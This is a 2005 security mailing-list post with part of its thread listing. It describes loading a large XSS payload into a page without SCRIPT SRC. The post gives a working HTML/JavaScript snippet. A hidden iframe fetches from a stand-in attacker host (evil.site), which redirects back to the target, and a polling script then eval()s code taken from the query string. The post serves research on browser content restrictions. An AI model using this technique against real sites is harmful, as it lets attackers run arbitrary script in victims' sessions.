WebApp Sec mailing list archives
Importing large code piece into Javascript context without SCRIPT SRC=...
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Fri, 14 Oct 2005 20:10:41 +0200
Hi Recently, I've been toying with the somewhat academic question of whether it is possible to "import" a large piece of JS code (to be used as XSS payload), given that a script context is already available, BUT without using SCRIPT SRC=... This question is triggered by the "script" keyword of Gervase Markham's Content- Restrictions suggestion (http://www.gerv.net/security/content-restrictions/). I came up with a nice idea, which is abusing any manner of loading HTML content (such as IFRAME, new windows, etc.) as following: The attacker forces a load from its own website (evil.site), which redirects the browser back to the original website (say target.site). It needs to do so with a query (e.g. "?data=..."). This query is the channel through which the JS payload is transmitted to the malicious bridge-head. In the below example, assume that evil.site/redir.cgi simply redirects to target.site/index.html?data=... Note that it may take few seconds for the target.site page to load, and meanwhile, the script (which runs in the target.site domain) cannot access the IFRAME (which initially is in evil.site domain). Hence the need for the loop. <iframe src="http://evil.site/redir.cgi" width=1 height=1></iframe> <script> var tid; function fetch() { try { var data=document.frames[0].location.search.substr(6); clearInterval(tid); eval(data); } catch(ex) { } } tid = setInterval('fetch()', 100); </script> As you can see, with about 240 bytes, I can force a load of any script code through the query part, which can host 4KB. And it's easy to do this multiple times. -Amit
Current thread:
- Importing large code piece into Javascript context without SCRIPT SRC=... Amit Klein (AKsecurity) (Oct 14)
- <Possible follow-ups>
- Re: Importing large code piece into Javascript context without SCRIPT SRC=... Amit Klein (AKsecurity) (Oct 17)